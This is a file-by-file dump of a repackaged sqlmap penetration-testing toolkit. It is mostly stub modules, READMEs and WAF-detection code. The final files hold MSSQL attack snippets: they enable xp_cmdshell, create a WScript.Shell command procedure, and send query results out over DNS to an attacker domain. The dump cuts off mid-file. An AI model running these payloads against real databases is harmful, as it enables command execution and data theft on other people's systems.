-------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/shell/stager.php_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/tamper/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/thirdparty/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/ansistrm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/thirdparty/ansistrm/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/bottle/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/colorama/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/thirdparty/colorama/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/magic/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/thirdparty/magic/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/multipart/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/thirdparty/multipart/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/oset/__init__.py: -------------------------------------------------------------------------------- 1 | """Main Ordered Set module """ 2 | 3 | from pyoset import oset 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/socks/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/thirdparty/socks/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/thirdparty/termcolor/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/thirdparty/termcolor/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/txt/wordlist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/txt/wordlist.zip -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/sqlmapproject/udfhack. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/linux/32/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/linux/32/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/linux/64/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/linux/64/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/windows/32/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/windows/64/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/inject/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/waf/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/waf/proventia.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "Proventia Web Application Security (IBM)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if page is None: 13 | return False 14 | page, headers, code = get_page(url="/Admin_Files/") 15 | return page is None 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/waf/webappsecure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "webApp.secure (webScurity)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if code == 403: 13 | return False 14 | page, headers, code = get_page(get="nx=@@") 15 | return code == 403 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/xml/banner/oracle.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/xml/banner/sharepoint.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/inject/xml/banner/x-aspnet-version.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/.gitattributes: -------------------------------------------------------------------------------- 1 | *.py text eol=lf 2 | *.conf text eol=lf 3 | 4 | *_ binary 5 | *.dll binary 6 | *.pdf binary 7 | *.so binary 8 | *.wav binary 9 | *.zip binary 10 | *.x32 binary 11 | *.x64 binary 12 | *.exe binary 13 | *.sln binary 14 | *.vcproj binary 15 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/.gitignore: -------------------------------------------------------------------------------- 1 | *.py[cod] 2 | output/ 3 | .sqlmap_history 4 | traffic.txt 5 | *~ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/doc/AUTHORS: -------------------------------------------------------------------------------- 1 | Bernardo Damele Assumpcao Guimaraes (@inquisb) 2 | 3 | 4 | Miroslav Stampar (@stamparm) 5 | 6 | 7 | You can contact both developers by writing to dev@sqlmap.org 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/doc/FAQ.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/doc/FAQ.pdf -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/doc/README.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/doc/README.pdf -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/beep/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/beep/beep.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/extra/beep/beep.wav -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/cloak/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/dbgtool/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/icmpsh/icmpsh.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/extra/icmpsh/icmpsh.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/runcmd/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder can be used to compile auxiliary program that can 2 | be used for running command prompt commands skipping standard "cmd /c" way. 3 | They are licensed under the terms of the GNU Lesser General Public License. 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/runcmd/windows/README.txt: -------------------------------------------------------------------------------- 1 | Compile only the Release version because the Runtime library option 2 | (Project Properties -> Configuration Properties -> C/C++ -> Code 3 | Generation) is set to "Multi-threaded (/MT)", which statically links 4 | everything into executable and doesn't compile Debug version at all. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/runcmd/windows/runcmd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // runcmd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/safe2bin/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/shellcodeexec/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/inquisb/shellcodeexec. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x32_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x32_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x64_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/extra/shellcodeexec/linux/shellcodeexec.x64_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/shellcodeexec/windows/shellcodeexec.x32.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/tools/sqli/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/shutils/blanks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Removes trailing spaces from blank lines inside project files 7 | find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/shutils/pep8.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pep8 on all python files (prerequisite: apt-get install pep8) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/shutils/pyflakes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/extra/sqlharvest/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/plugins/dbms/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/plugins/dbms/db2/filesystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem 9 | 10 | class Filesystem(GenericFilesystem): 11 | def __init__(self): 12 | GenericFilesystem.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/plugins/dbms/db2/takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.takeover import Takeover as GenericTakeover 9 | 10 | class Takeover(GenericTakeover): 11 | def __init__(self): 12 | self.__basedir = None 13 | self.__datadir = None 14 | 15 | GenericTakeover.__init__(self) 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/plugins/dbms/mysql/enumeration.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.enumeration import Enumeration as GenericEnumeration 9 | 10 | class Enumeration(GenericEnumeration): 11 | def __init__(self): 12 | GenericEnumeration.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/plugins/generic/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder represent SQL snippets used by sqlmap on the target 2 | system. 3 | They are licensed under the terms of the GNU Lesser General Public License 4 | where not specified otherwise. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/activate_sp_oacreate.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'ole automation procedures',1; 4 | RECONFIGURE WITH OVERRIDE 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/configure_openrowset.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options', 1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options', 0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/configure_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options',0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/create_new_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | DECLARE @%RANDSTR% nvarchar(999); 2 | set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; 3 | EXEC master..sp_executesql @%RANDSTR% 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/disable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_dropextendedproc 'xp_cmdshell' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/dns_request.sql: -------------------------------------------------------------------------------- 1 | DECLARE @host varchar(1024); 2 | SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; 3 | EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') 4 | # or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') 5 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/enable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/tools/sqli/procs/mssqlserver/run_statement_as_user.sql: -------------------------------------------------------------------------------- 1 | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 2 | # SELECT * FROM OPENROWSET('SQLNCLI', 